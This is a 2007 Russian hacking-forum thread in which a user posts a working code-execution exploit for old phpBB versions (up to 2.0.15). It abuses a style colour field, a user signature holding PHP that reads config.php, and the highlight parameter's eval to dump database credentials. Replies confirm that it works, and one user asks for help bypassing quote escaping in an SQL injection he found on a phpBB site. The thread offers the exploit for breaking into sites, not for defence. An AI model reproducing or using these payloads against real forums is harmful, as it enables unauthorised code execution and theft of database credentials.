Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   phpbb(highlight) (https://forum.antichat.xyz/showthread.php?t=43829)

fly 06.07.2007 04:25
phpbb(highlight)
 
Может кому пригодится .
Давно ломал сайт , там стоял старый phpbb . Через базу не смог проделать инклуд. И все остальные способы не помогли. И вот нарыл такой способ.

Идем Administration Panel --> Styles Admin --> Management --> subSilver --> Edit
Затем находим "Font Colour 3" и вместо 6цифр_цвета:
Код:
"'./*"
Далее идем в админский профайл или любой другой юзерский и в поле подписи Signature вставляем:
Код:
"$fd=fopen($phpbb_root_path.'config.php','rb');while(!feof($fd)){echo htmlspecialchars(fgets($fd));}"
Сохраняем!
После этого создаем в любом топике сообщение с текстом:
Код:
"*/var_dump(eval($user_sig)).flush().die().'"
Ну и всем известный способ --- допишем к топику &highlight=1 ---в моем случае я получил пасс и логин от базы.

NApoleonchik 06.07.2007 10:55
Круто. Сам испробовал - работает!

_SploiT_ 16.07.2007 23:49
А версию точно не помнишь?

Basurman 17.07.2007 00:14
<=2.0.15

che_ha 10.08.2007 17:29
Всем привет.
Я извиняюсь что не в тему , просто не хотел создавать лишний раз тему.
Нашел на phpBB MS SQL-injection.Могу провести несколько запросов где не исползуються знаки ( '," ) , всегда когда вставлю этот знак ,фильтр перед ним встявляет ( \ ),итоге Incorrect syntax near '\'.

Ничего не смог придумать , может вы знаете какие-нибудь решение ?
СПС.

guest3297 10.08.2007 18:38
Читай статьи.


Время: 13:27